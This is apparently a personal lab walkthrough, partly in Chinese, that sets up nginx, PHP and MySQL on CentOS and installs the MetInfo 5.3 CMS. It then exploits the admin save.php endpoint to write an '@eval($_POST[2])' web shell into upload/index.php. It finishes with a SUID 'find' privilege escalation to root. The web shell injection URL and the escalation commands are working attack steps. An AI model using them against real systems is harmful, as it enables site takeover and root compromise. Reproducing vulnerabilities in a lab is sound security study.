Metinfo

1
2
3
4
5
yum install nginx
systemctl start nginx
systemctl enable nginx

http://47.102.216.64

1
2
yum install php php-fpm php-mysql php-devel php-gd php-pecl-memcache php-pspell php-snmp php-xmlrpc php-xml php-pdo php-pgsql php-pecl-redis php-soap
php -v

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
vim /etc/nginx/nginx.conf

location ~ \.php$ {
try_files $uri =404;
fastcgi_pass unix:/var/run/php-fpm/php-fpm.sock;
fastcgi_index index.php;
fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
include fastcgi_params;

###Save user landing page to cookie: srcid for PHP files
##add_header Set-Cookie $srcid;
}

location / {
    try_files $uri $uri/ /index.php?$query_string;
}

1
2
3
4
5
6
7
8
9
vim /etc/php-fpm.d/www.conf

user = nginx 
group = nginx 
listen = /var/run/php-fpm/php-fpm.sock 

listen.owner = nignx
listen.group = nginx
listen.mode = 0660

1
2
3
4
5
vim /etc/php.ini

cgi.fix_pathinfo=0

systemctl restart php-fpm nginx

1
2
3
4
5
6
7
8
vim /usr/share/nginx/html/test.php

<?php
  // test script for CentOS/RHEL 7+PHP 7.2+Nginx 
  phpinfo();
?>

http://47.102.216.64/test.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
# remove old version

yum list installed mysql*
rpm -qa | grep mysql*

uname -m 

cat /etc/redhat-release

https://dev.mysql.com/downloads/repo/yum/

https://dev.mysql.com/downloads/mysql/

wget https://repo.mysql.com//mysql80-community-release-el7-10.noarch.rpm

rpm -ivh mysql80-community-release-el7-10.noarch.rpm

yum info mysql-community-server

yum -y install mysql-community-server

systemctl status mysqld

systemctl start mysqld

systemctl status mysqld

# 查询初始密码

less /var/log/mysqld.log

mysqladmin -u root -p password

mysql -h 127.0.0.1 -u root -p

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
wget http://www.metinfo.cn/upload/file/MetInfo5.3.zip
unzip -d ./metinfo MetInfo5.3.zip
http://47.102.216.64/install/index.php

yum search php |grep mbstring
yum install php-mbstring.x86_64
systemctl restart php-fpm nginx

vim /etc/php.ini
session.save_path = "/tmp"
systemctl restart php-fpm nginx


use mysql
ALTER USER 'root'@'localhost' IDENTIFIED WITH mysql_native_password BY 'new password';
FLUSH PRIVILEGES;

http://47.102.216.64/admin/index.php

1
2
3
4
http://47.102.216.64/admin/column/save.php?name=123&action=editor&foldername=upload&module=22;@eval($_POST[2]);/*

http://47.102.216.64/admin/column/index.php?anyid=&lang=cn&turnovertext=%E6%93%8D%E4%BD%9C%E6%88%90%E5%8A%9F

1
2
http://47.102.216.64/upload/index.php
可以打开界面和命令行进行操作

1
2
3
4
5
6
7
8
9
10
<?php
# MetInfo Enterprise Content Management System
# Copyright (C) MetInfo Co.,Ltd (http://www.metinfo.cn). All rights reserved.
$filpy = basename(dirname(__FILE__));
$fmodule=22;@eval($_POST[2]);/*;
require_once '../include/module.php';
require_once $module;
# This program is an open source system, commercial use, please consciously to purchase commercial license.
# Copyright (C) MetInfo Co., Ltd. (http://www.metinfo.cn). All rights reserved.
?>

1
2
3
4
5
6
7
8
9
(nginx:/usr/local/metinfo/upload) $ whoami
nginx

find / - user root -perm -4000 -print 2>/dev/null
chmod u+s /usr/bin/find
find / - user root -perm -4000 -print 2>/dev/null

(nginx:/usr/local/metinfo/upload) $ find index.php -exec whoami \;   
root